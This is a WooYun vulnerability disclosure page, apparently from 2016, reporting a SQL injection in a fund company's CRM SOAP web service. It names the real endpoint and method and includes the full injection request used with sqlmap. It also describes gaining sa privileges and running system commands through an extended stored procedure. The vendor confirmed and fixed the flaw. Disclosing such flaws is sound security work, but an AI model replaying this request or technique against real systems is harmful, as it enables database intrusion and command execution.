当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198191

漏洞标题:南方基金某系统WebService接口SQL注入漏洞(sa权限可执行命令)

相关厂商:南方基金管理有限公司

漏洞作者: peer

提交时间:2016-04-19 15:57

修复时间:2016-06-04 08:00

公开时间:2016-06-04 08:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-30: 细节向核心白帽子及相关领域专家公开
2016-05-10: 细节向普通白帽子公开
2016-05-20: 细节向实习白帽子公开
2016-06-04: 细节向公众公开

简要描述:

南方基金某系统WebService接口SQL注入漏洞(sa权限可执行命令)

详细说明:

接口地址(CRM系统):http://crm.southernfund.com:8088/CRMWebService.asmx?WSDL
存在注入的方法:sendmessagetoapns

1.jpg


2.jpg


BurpSuite拦截数据包,放sqlmap中跑数据:
数据包:

POST /CRMWebService.asmx HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: "http://webservice.sinitek.com/sendmessagetoapns"
Content-Length: 453
Host: crm.southernfund.com:8088
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.sinitek.com/">
<soapenv:Header/>
<soapenv:Body>
<web:sendmessagetoapns>
<!--Optional:-->
<web:systemuserid><![CDATA[1*]]></web:systemuserid>
<!--Optional:-->
<web:apncontent>22222</web:apncontent>
</web:sendmessagetoapns>
</soapenv:Body>
</soapenv:Envelope>


1.jpg


sa权限,尝试使用扩展存储去执行命令:

2.jpg


1.jpg


从clees表中获取命令执行结果:

3.jpg


漏洞证明:

1.jpg

修复方案:

过滤参数

版权声明:转载请注明来源 peer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-20 07:57

厂商回复:

漏洞已修复,谢谢

最新状态:

暂无


漏洞评价:

评价

  1. 2016-04-19 17:09 | Dotaer ( 路人 | Rank:22 漏洞数:6 | 多学习,多挖洞!)

    大哥,给我账号充点钱!